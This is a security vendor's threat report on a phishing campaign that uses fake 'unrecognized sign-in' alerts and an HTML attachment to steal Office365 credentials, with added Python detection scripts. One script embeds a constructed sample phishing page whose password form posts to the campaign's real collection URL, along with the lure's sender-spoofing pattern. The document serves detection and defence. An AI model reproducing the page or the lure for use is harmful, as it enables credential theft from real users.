
By Luis Raul Parra, Cofense Phishing Defense Center

At some point in your (digital) life you have received annoying notifications about unexpected sign-in attempts to one of your accounts or services, and you have ignored them. After all, it was just an attempt; no one was able to access anything. Yet, if you are vigilant enough, you would report this unauthorized attempt to the service provider and contribute to enhancing security. Well done! But keep reading; this article is for you.

The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign that aims to harvest Office365 (O365) credentials of “vigilant” users who want to act on unrecognized sign-in attempts to their accounts.  

The campaign was reported by users in several companies across English-speaking countries including the United States, England and Scotland. The message was carefully crafted to pass as a real alert of an unexpected sign-in on the recipient's corporate account. It urged immediate action.

Figure 1: Email Body

All reported emails used the same technique to customize the attack: The “From” field contained the address “postmaster@COMPANYDOMAIN.cpasurveys.com” in order to convince the end user that this was a valid alert notification from their company’s email security system.  

Figure 2: Email Header

The subject of the email states that there was a sign-in attempt to the user’s account from an unrecognized device, specifying the name of the user and claiming to come from “COMPANYNAME Mail Service”. The content of the body states the timestamp, location, IP address and device where the (false) attempt was performed. In all cases, the IP address shown in the body was 194[.]209[.]77[.]62.  

To make the email even more credible, the attackers included a confirmation code stated to be valid for 24 hours with aims of pressuring the recipient to act within that time. They were thoughtful enough to add the message “if this was you, you’re all set!” 

Furthermore, there was the option to click on the “Unsubscribe” button in order to stop receiving future messages like these. The URL behind a link of the type hxxps://tracking[.]mail[.]netflix[.]tshirtsintaramerica[.]com/click/* is possibly just a tracker that then redirected to the official company website.
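The sender pattern and body details above lend themselves to a simple mail-gateway or SOAR check. The following script is an added example, not Cofense's tooling: it parses a constructed message modelled on the campaign (the real COMPANYDOMAIN is replaced by the placeholder example.com, and the recipient name and body wording are assumptions) and flags the three traits the report describes: the company domain embedded as a subdomain of an unrelated domain in the From address, a postmaster@ sender that is not actually from the organisation, and the known-bad IP address cited in the body.

```python
import re
from email import policy
from email.parser import BytesParser

# Constructed sample message modelled on the campaign described in the post.
# "example.com" stands in for the victim's COMPANYDOMAIN; the sender domain
# suffix and the body IP are the ones reported (defanged in the post).
SAMPLE_EML = b"""From: "Example Mail Service" <postmaster@example.com.cpasurveys.com>
To: alice@example.com
Subject: Sign-in attempt from unrecognized device for alice
Content-Type: text/plain; charset=utf-8

We detected a sign-in attempt from an unrecognized device.
IP address: 194.209.77.62
Confirmation code valid for 24 hours. If this was you, you're all set!
"""

# IP address quoted in the campaign's email body (194[.]209[.]77[.]62 in the post).
KNOWN_BAD_IPS = {"194.209.77.62"}

def sender_domain(msg):
    """Return the domain part of the first From address, lower-cased."""
    addr = msg["From"].addresses[0].addr_spec
    return addr.rsplit("@", 1)[1].lower()

def is_lookalike_subdomain(sender_dom, org_domain):
    """True when the organisation's domain is used as a leading label of an
    unrelated domain, e.g. example.com.cpasurveys.com for example.com."""
    sender_dom = sender_dom.lower()
    org_domain = org_domain.lower()
    if sender_dom == org_domain or sender_dom.endswith("." + org_domain):
        return False  # genuinely our domain or a real subdomain of it
    return sender_dom.startswith(org_domain + ".")

def analyze(raw_eml, org_domain):
    """Return a list of human-readable findings for one raw RFC 5322 message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_eml)
    findings = []
    dom = sender_domain(msg)
    if is_lookalike_subdomain(dom, org_domain):
        findings.append(f"sender domain {dom} embeds {org_domain} "
                        f"as a subdomain of another domain")
    # A "postmaster" alert that does not originate from our own domain.
    if "postmaster@" in str(msg["From"]).lower() and dom != org_domain:
        findings.append("postmaster@ sender from a domain that is not ours")
    body = msg.get_body(preferencelist=("plain", "html")).get_content()
    for ip in re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", body):
        if ip in KNOWN_BAD_IPS:
            findings.append(f"body cites known-bad IP {ip}")
    return findings

if __name__ == "__main__":
    for line in analyze(SAMPLE_EML, "example.com"):
        print("FLAG:", line)
```

The subdomain check deliberately treats real subdomains of the organisation (mail.example.com) as benign and only fires when the organisation's name is a prefix of some other registrable domain, which is exactly the trick used in the COMPANYDOMAIN.cpasurveys.com addresses.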

The credential phishing attempt was done through an HTML file attached to the email. Images and CSS styles were pulled from a different website: hxxps://youmustlast[.]website/wassets/: 

Figure 3: CSS Style 

The HTML file already contained the user’s email address in the email account address field: 

Figure 4: Phishing Page

Should the recipient enter the corporate credentials into the attached HTML page, a POST action sends the username and password to the threat actor at the URL hxxps://sharepreview[.]site/win/next[.]php.

Figure 5: POST Action
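An attached HTML file like the one described above can be triaged without opening it in a browser. The script below is an added example and not Cofense's code: it feeds a constructed attachment (the hosts and paths are the report's IoCs, shown here undefanged so that the URL parser accepts them; the page layout, field names and the pre-filled address alice@example.com are assumptions) through Python's html.parser and reports the traits the post describes: a form containing a password field that posts to an external host, a form action on a known IoC host, an email field pre-filled with the recipient's address, and stylesheets or images pulled from an IoC host.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment modelled on the phishing page in the post.
# Hosts and paths are the reported IoCs; everything else is assumed.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="https://youmustlast.website/wassets/statuspage.css">
</head><body>
<img src="https://youmustlast.website/wassets/logo.png">
<form method="POST" action="https://sharepreview.site/win/next.php">
  <input type="text" name="email" value="alice@example.com">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form></body></html>"""

# Hosts from the Network IOC table in the post.
IOC_HOSTS = {"sharepreview.site", "youmustlast.website"}

class CredFormParser(HTMLParser):
    """Collects external asset hosts and the forms (with their inputs) in a page."""

    def __init__(self):
        super().__init__()
        self.external_hosts = set()
        self.forms = []      # dicts: method, action, has_password, prefilled
        self._form = None    # form currently being parsed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("link", "img", "script"):
            url = a.get("href") if tag == "link" else a.get("src")
            host = urlparse(url or "").hostname
            if host:
                self.external_hosts.add(host.lower())
        elif tag == "form":
            self._form = {"method": (a.get("method") or "GET").upper(),
                          "action": a.get("action") or "",
                          "has_password": False, "prefilled": {}}
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "").lower() == "password":
                self._form["has_password"] = True
            elif a.get("name") and a.get("value"):
                # A value baked into a named field: the page arrived pre-filled.
                self._form["prefilled"][a["name"]] = a["value"]

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None

def assess(html):
    """Return (list of verdict strings, populated parser) for one HTML attachment."""
    p = CredFormParser()
    p.feed(html)
    verdicts = []
    for f in p.forms:
        host = (urlparse(f["action"]).hostname or "").lower()
        if f["has_password"] and host:
            verdicts.append(f"password form posts from a local file to {host}")
        if host in IOC_HOSTS:
            verdicts.append(f"form action matches IoC host {host}")
        for name, val in f["prefilled"].items():
            if "@" in val:
                verdicts.append(f"field {name} is pre-filled with {val}")
    for h in sorted(p.external_hosts & IOC_HOSTS):
        verdicts.append(f"loads assets from IoC host {h}")
    return verdicts, p

if __name__ == "__main__":
    for v in assess(SAMPLE_HTML)[0]:
        print("FLAG:", v)
```

The first check (a password field in a form whose action is an absolute external URL) is the generic one: a legitimate login page is served by the site it submits to, so an HTML file delivered as an attachment that posts credentials to any remote host is suspicious regardless of whether the host is already on an IoC list.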

Credential phishing done. At the same time, you’ve been made to feel vigilant at having spotted something untoward happening with your account. That’s how the attackers attempt to trip up alert and conscientious users.  

Network IOC                                              IP
hXXps://sharepreview[.]site/win/next[.]php               23[.]254[.]130[.]108
hXXps://youmustlast[.]website/wassets/statuspage[.]css   63[.]250[.]38[.]73

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.